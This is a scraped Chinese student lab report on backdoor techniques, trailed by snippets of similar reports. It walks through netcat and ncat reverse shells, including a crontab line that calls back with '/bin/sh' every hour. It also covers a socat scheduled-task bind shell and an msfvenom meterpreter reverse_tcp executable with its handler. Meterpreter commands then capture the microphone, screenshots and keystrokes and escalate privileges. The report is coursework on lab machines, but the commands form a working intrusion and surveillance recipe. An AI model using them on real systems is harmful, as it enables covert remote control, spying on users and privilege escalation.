2. 程式人生 > >Exp2 後門原理與實踐 20154301仉鑫燁

Exp2 後門原理與實踐 20154301仉鑫燁

阿新 發佈:2018-03-29
編輯 lock 命令 兩臺 鎖定 com windows 程序 獲取

20154301《網絡對抗》Exp2 後門原理與實踐

20154301仉鑫燁

一、實驗內容

常用後門工具實踐:
  • Windows獲得Linux Shell:

  1. 在Windows下,先使用ipconfig指令查看win7虛擬機IP:
    技術分享圖片

  2. 使用ncat.exe程序監聽本機的4301端口:
    技術分享圖片

  3. Kali:使用nc指令的-e選項反向連接Windows主機的4301端口:
    技術分享圖片

  4. Windows下成功獲得了一個Kali的shell,運行ls指令如下:
    技術分享圖片

  • Linux獲得Windows Shell:

  1. 過程與之前的類似,在Kali環境下用ifconfig查看IP:
    技術分享圖片

  2. 使用nc指令監聽4301端口:
    技術分享圖片

  3. 在Windows下,使用ncat.exe

    程序的-e選項項反向連接Kali主機的4301端口:
    技術分享圖片

  4. Kali下可以看到Windows的命令提示,可以輸入Windows命令:
    技術分享圖片

  • 使用nc傳輸數據:

  1. Windows下監聽4301端口:
    技術分享圖片

  2. Kali下連接到Windows的4301端口:
    技術分享圖片

  3. 建立連接之後,就可以傳輸數據了,這裏傳輸的是字符串,相當於兩臺主機在聊天,也可以用重定向操作符來傳輸文件:
    技術分享圖片
    技術分享圖片

  • 使用netcat獲取主機操作Shell,cron啟動

  1. 先在Windows系統下,監聽4301端口:
    技術分享圖片

  2. 在Kali環境下,使用man crontab指令查看crontab命令的幫助文檔,從文檔中我們可以知道crontab指令可以用於設置周期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab

    文件中,以供之後讀取和執行。
    技術分享圖片

  3. crontab -e指令編輯一條定時任務,選擇編輯器時選擇基本的vim編輯器就行:
    (最後一行為44 * * * * /bin/netcat 192.168.108.131 4301 -e /bin/sh,意思是在每個小時的第44分鐘反向連接Windows主機的4301端口,此時時間為16:43)
    技術分享圖片

  4. 時間到16點44分,此時已經獲得了Kali的shell,可以輸入指令(如果在這之前輸入指令,屏幕上不會有顯示,但是等到了44分時會立馬顯示出來):
    技術分享圖片

  • 使用socat獲取主機操作Shell, 任務計劃啟動

    基礎知識:
    socatncat的增強版,它使用的格式是socat [options] <address> <address>
    ,其中兩個address是必選項,而options 是可選項。
    socat的基本功能就是建立兩個雙向的字節流,數據就在其間傳輸,參數address就是代表了其中的一個方向。所謂流,代表了數據的流向,而數據則可以有許多不同的類型,命令中也就相應需要許多選項對各種不同的類型數據流進行限定與說明。

  1. 在Windows系統下,打開控制面板->管理工具->任務計劃程序,創建任務,填寫任務名稱後,新建一個觸發器:
    技術分享圖片

  2. 在操作->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:4301 exec:cmd.exe,pty,stderr,這個命令的作用是把cmd.exe綁定到端口4301,同時把cmd.exe的stderr重定向到stdout上:
    技術分享圖片

  3. 創建完成之後,可以windows+L鎖定計算機讓它執行。
    技術分享圖片

  4. 此時,在Kali環境下輸入指令socat - tcp:192.168.108.131:4301,這裏的第一個參數-代表標準的輸入輸出,第二個流連接到Windows主機的4301端口,此時可以發現已經成功獲得了一個cmd shell:
    技術分享圖片

  • 使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

  1. 輸入指令
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=4301 -f exe > 20154301_backdoor.exe
    生成後門程序:
    技術分享圖片

  2. 通過‘nc‘指令將生成的後門程序傳送到Windows主機上:
    技術分享圖片

  3. 在Kali上使用msfconsole指令進入msf控制臺,使用監聽模塊,設置payload,設置反彈回連的IP和端口:use exploit/multi/handler set payload windows/meterpreter/reverse_tcp
    技術分享圖片

  4. 設置完成後,執行監聽:
    技術分享圖片

  5. 打開Windows上的後門程序:20154301_backdoor.exe
    技術分享圖片

  6. 此時Kali上已經獲得了Windows主機的連接,並且得到了遠程控制的shell:
    技術分享圖片

  • 使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

  1. 使用record_mic指令截獲一段音頻:
    技術分享圖片

  2. 使用webcam_snap指令可以使用攝像頭進行拍照:(電腦沒有色相頭!!)

  3. 使用screenshot指令可以進行截屏:
    技術分享圖片

  4. 使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:
    技術分享圖片
    技術分享圖片

  5. 先使用getuid指令查看當前用戶,使用getsystem指令進行提權,如圖所示,提權成功:
    技術分享圖片

Exp2 後門原理與實踐 20154301仉鑫燁

相關推薦

Exp2 後門原理實踐 20154301

編輯 lock 命令 兩臺 鎖定 com windows 程序 獲取 20154301《網絡對抗》Exp2 後門原理與實踐 20154301仉鑫燁 一、實驗內容 常用後門工具實踐: Windows獲得Linux Shell: 在Windows下,先使用ipconf

Exp2 後門原理實踐(未完待續)

bin image alt job 模塊 加強 ont .sh 問題 Exp2 後門原理與實踐 實驗環境 攻擊機 kali 4.14(64位) (IP: 10.0.2.6/24) 靶機 ubuntu 16.04(32位) (IP: 10.0.2.4/24) windo

網絡對抗技術 2017-2018-2 20152515 Exp2 後門原理實踐

技術分享 cnblogs 利用 mage 可選 任務計劃 攝像頭 寫入 提權 1.實驗內容 (1)使用netcat獲取主機操作Shell,cron啟動 (0.5分) (2)使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分) (3)使用MSF meterp

20155216 Exp2 後門原理實踐

hand 地址 同時 bin log code 文字 其他 進行 後門原理與實踐 常用後門工具 NC 或 netcat netcat是一個底層工具,進行基本的TCP UDP數據收發。常被與其他工具結合使用,起到後門的作用。 Linux: 一般自帶netcat,"man ne

20155227《網絡對抗》Exp2 後門原理實踐

web img 準備 etc ons 並運行 reverse 體會 定時 20155227《網絡對抗》Exp2 後門原理與實踐 基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? 在非官方網站下載軟件時,後門很可能被捆綁在軟件中。 攻擊者利用欺騙的手段,

20154324 劉康權 《網絡對抗》Exp2 後門原理實踐

nsh png netcat nta vim編輯 時間 clas 自己的 rontab 一、實踐目標與內容 1.學習內容 使用nc實現win,mac,Linux間的後門連接 meterpreter的應用 MSF POST 模塊的應用 2.學習目標 學習建立一個後門連接

20155312 張競予 Exp2 後門原理實踐

gets std pty ever 哪些 分享圖片 程序 啟動過程 學會 Exp2 後門原理與實踐 目錄 基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? (2)例舉你知道的後門如何啟動起來(win及linux)的方式? (3)Meterprete

Exp2 後門原理實踐

linux title 本機 學習目標 ont 網段 OS net channel 一、實踐目標與內容 1.學習內容 使用nc實現win,mac,Linux間的後門連接 meterpreter的應用 MSF POST 模塊的應用 2.學習目標 學習建

20155209 林虹宇Exp2 後門原理實踐

拍照 端口 一個 err 當前 list gets 沒有 com Exp2 後門原理與實踐 實驗內容 一、使用netcat獲取主機操作Shell,cron啟動 使用netcat獲取主機操作Shell Win獲得Linux Shell 查看win的ip地址 windo

20155334 曹翔 Exp2 後門原理實踐

bubuko 直接 net 重定向 system 技術 image AR ali 20155334 曹翔 Exp2 後門原理與實踐 不多廢話直接上實驗過程,本實驗的所有端口都是5334。 一、實驗過程 查詢主機Windows和虛擬機kali的ip地址: Windows

2018-2019-2 網絡對抗技術 20165230 Exp2 後門原理實踐

ping 反向連接 後門 操作 netcat 方式 拍照 art 基本 目錄 1.實驗內容 2.基礎問題回答 3.常用後門工具實踐 3.1netcat 3.

Exp2 後門原理實踐 ——20164316張子遙

操作系統 linux定時任務 con 管理員 遠程控制 clear 最後一行 任務管理器 地址 一、實踐基本內容 1.實踐目標 (1)使用netcat獲取主機操作Shell,cron啟動 (2)使用socat獲取主機操作Shell, 任務計劃啟動 (3)使用MS

2018-2019-2 網絡對抗技術 20165231 Exp2 後門原理實踐

class 一個 打開 功能 目標 rontab head 定時任務 con 實驗內容 1.使用netcat獲取主機操作Shell,cron啟動 2.使用socat獲取主機操作Shell, 任務計劃啟動 3.使用MSF meterpreter(或其他軟件)生成可執

20165306 Exp2 後門原理實踐

技術分享 out web hot erp 流程 常用 開始 cron 20165306 Exp2 後門原理與實踐 實驗內容 (1)使用netcat獲取主機操作Shell,cron啟動 (2)使用socat獲取主機操作Shell, 任務計劃啟動 (3)使用MSF meterp

20165229 NetSec Exp2後門原理實踐

其他 準備 tun sfc ip地址 開機 消息 cor mach 20165229 NetSec Exp2後門原理與實踐 一、基礎問題 例舉你能想到的一個後門進入到你系統中的可能方式? 打開一個掛碼網頁,會自動下載安裝並執行木馬程序,在系統中留下後門。 將不明來源

Exp2後門原理實踐 20164312馬孝濤

有一個 方式 提權 3.2 控制 傳輸 監聽 web show 實驗內容 使用netcat獲取主機操作Shell,cron啟動 (0.5分) 使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分) 使用MSF meterpreter

2018-2019-2 20165331《網絡對抗技術》Exp2 後門原理實踐

ima 例如 pty 並運行 art 就是 輸入 options lin 2018-2019-2 20165331《網絡對抗技術》Exp2 後門原理與實踐 實驗收獲與感想 通過本次實驗,我對後門的生成及工作原理有了更深的理解,也學會了怎樣用後門攻擊同一網段下的不同主機。但是

網路對抗技術Exp2-後門原理實踐

**後門概念** 後門就是不經過正常認證流程而訪問系統的通道。 哪裡有後門呢? 編譯器留後門 作業系統留後門 最常見的當然還是應用程式中留後門 還有就是潛伏於作業系統中或偽裝為特定應用的專用後門程式。 -- 下面是近些年的一些例子: 編譯器:蘋果Xcode後門事件。蘋果Xcode後門事件中招的APP包

20154307 《網絡對抗技術》實驗二 後門原理實踐

文件的 img 選擇 msfvenom 任務計劃 err clas 關閉 ali 20154307 《網絡對抗技術》實驗二 後門原理與實踐 一、基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? 答:下載盜版軟件或者盜版電影的時候。 (2)例舉你知道的後門

2017-2018-2 20155231《網絡對抗技術》實驗二:後門原理實踐

虛擬機ip src oca ali 執行 -m 定時 port art 2017-2018-2 20155231《網絡對抗技術》實驗二:後門原理與實踐 常用後門工具 一、Windows獲得Linux的Shell 在本機cmd中使用ipconfig獲得windows的IP地址